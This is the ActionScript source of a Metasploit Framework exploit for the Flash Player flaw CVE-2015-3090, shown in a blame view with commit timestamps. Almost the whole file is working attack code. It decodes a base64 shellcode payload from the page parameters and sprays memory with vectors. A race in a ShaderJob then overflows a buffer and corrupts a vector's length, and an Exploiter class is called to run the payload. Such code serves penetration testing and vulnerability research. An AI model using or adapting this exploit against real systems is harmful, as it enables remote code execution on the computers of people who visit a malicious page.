metasploit-framework/external/source/exploits/CVE-2015-3090/Exploit.as

103 lines
3.7 KiB
ActionScript
Raw Normal View History

2015-06-18 17:36:14 +00:00
package
{
2015-06-18 17:38:36 +00:00
import flash.display.BitmapData
import flash.display.Shader
import flash.display.ShaderJob
import flash.display.Sprite
import flash.utils.getTimer
2015-06-18 17:36:14 +00:00
import flash.display.LoaderInfo
import mx.utils.Base64Decoder
import flash.utils.ByteArray
2015-06-18 17:38:36 +00:00
2015-06-18 17:40:30 +00:00
public class Exploit extends Sprite
2015-06-18 17:36:14 +00:00
{
2015-06-18 17:38:36 +00:00
[Embed ( source="exploit.pbj", mimeType="application/octet-stream" ) ]
private static var BilinearScaling:Class
private var ov:Vector.<Object>
2015-06-18 17:36:14 +00:00
private var uv:Vector.<uint>
2015-06-18 17:38:36 +00:00
2015-06-18 17:36:14 +00:00
private var b64:Base64Decoder = new Base64Decoder()
private var payload:ByteArray
private var platform:String
private var os:String
private var exploiter:Exploiter
2015-06-18 17:38:36 +00:00
public function Exploit()
{
2015-06-18 17:36:14 +00:00
platform = LoaderInfo(this.root.loaderInfo).parameters.pl
os = LoaderInfo(this.root.loaderInfo).parameters.os
var b64_payload:String = LoaderInfo(this.root.loaderInfo).parameters.sh
var pattern:RegExp = / /g;
b64_payload = b64_payload.replace(pattern, "+")
b64.decode(b64_payload)
payload = b64.toByteArray()
var srcBmd:BitmapData = new BitmapData(0x93, 1, true, 0x40000000);
// Create and configure a Shader object to apply the the bilinear scaling bytecode
var shader:Shader = new Shader()
shader.byteCode = new BilinearScaling()
shader.data.scale.value = [1]
shader.data.src.input = srcBmd
// Put vectors in memory
ov = new Vector.<Object>(1024)
2015-06-18 17:38:36 +00:00
2015-06-18 17:36:14 +00:00
for (var i:uint = 0; i < ov.length; i++) {
ov[i] = new Vector.<uint>(0xa6)
ov[i][0] = 0xdeedbeef
ov[i][1] = i
ov[i][2] = 0xdeadbeaf
}
2015-06-18 17:38:36 +00:00
2015-06-18 17:36:14 +00:00
// Create holes by redimensioning some vectors
for (i = ov.length / 2; i < ov.length; i = i + 6) {
ov[i].length = 0x14c // 0xa6 * 2
}
2015-06-18 17:38:36 +00:00
2015-06-18 17:36:14 +00:00
// Defragment memory so hopefully one of our holes will be used
// by the ShaderJob later...
var defrag:Vector.<Object> = new Vector.<Object>(20)
for(i = 0; i < defrag.length; i++) {
defrag[i] = new Vector.<uint>(0xa6)
}
2015-06-18 17:38:36 +00:00
2015-06-18 17:36:14 +00:00
// Apply the bilinear scaling with a ShaderJob, so the job
// can be execued on a new thread, providing us the opportunity
// to tweak the width attribute after starting the job, providing
// a buffer overflow situation
var shaderJob:ShaderJob = new ShaderJob()
shaderJob.shader = shader
shaderJob.target = srcBmd
shaderJob.width = 0
shaderJob.start()
shaderJob.width = 0xa5 // Overwrite "next" vector length
this.WaitTimer(1000)
2015-06-18 17:38:36 +00:00
2015-06-18 17:36:14 +00:00
for (i = 0; i < ov.length; i++) {
if (ov[i].length != 0xa6 && ov[i].length != 0x14c) {
Logger.log("[*] Exploit - Exploit(): Vector corrupted: " + i.toString() + " : " + ov[i].length.toString())
uv = ov[i]
} else {
delete(ov[i])
ov[i] = null
}
}
2015-06-18 17:38:36 +00:00
2015-06-18 17:36:14 +00:00
if (uv == null) {
Logger.log("[!] Exploit - Exploit(): Corrupted Vector not found")
return
}
2015-06-18 17:38:36 +00:00
2015-06-18 17:36:14 +00:00
exploiter = new Exploiter(this, platform, os, payload, uv)
2015-06-18 17:38:36 +00:00
}
2015-06-18 17:36:14 +00:00
private function WaitTimer(time:int):void{
var current:int = getTimer()
while (true) {
if ((getTimer() - current) >= time) break
}
}
}
}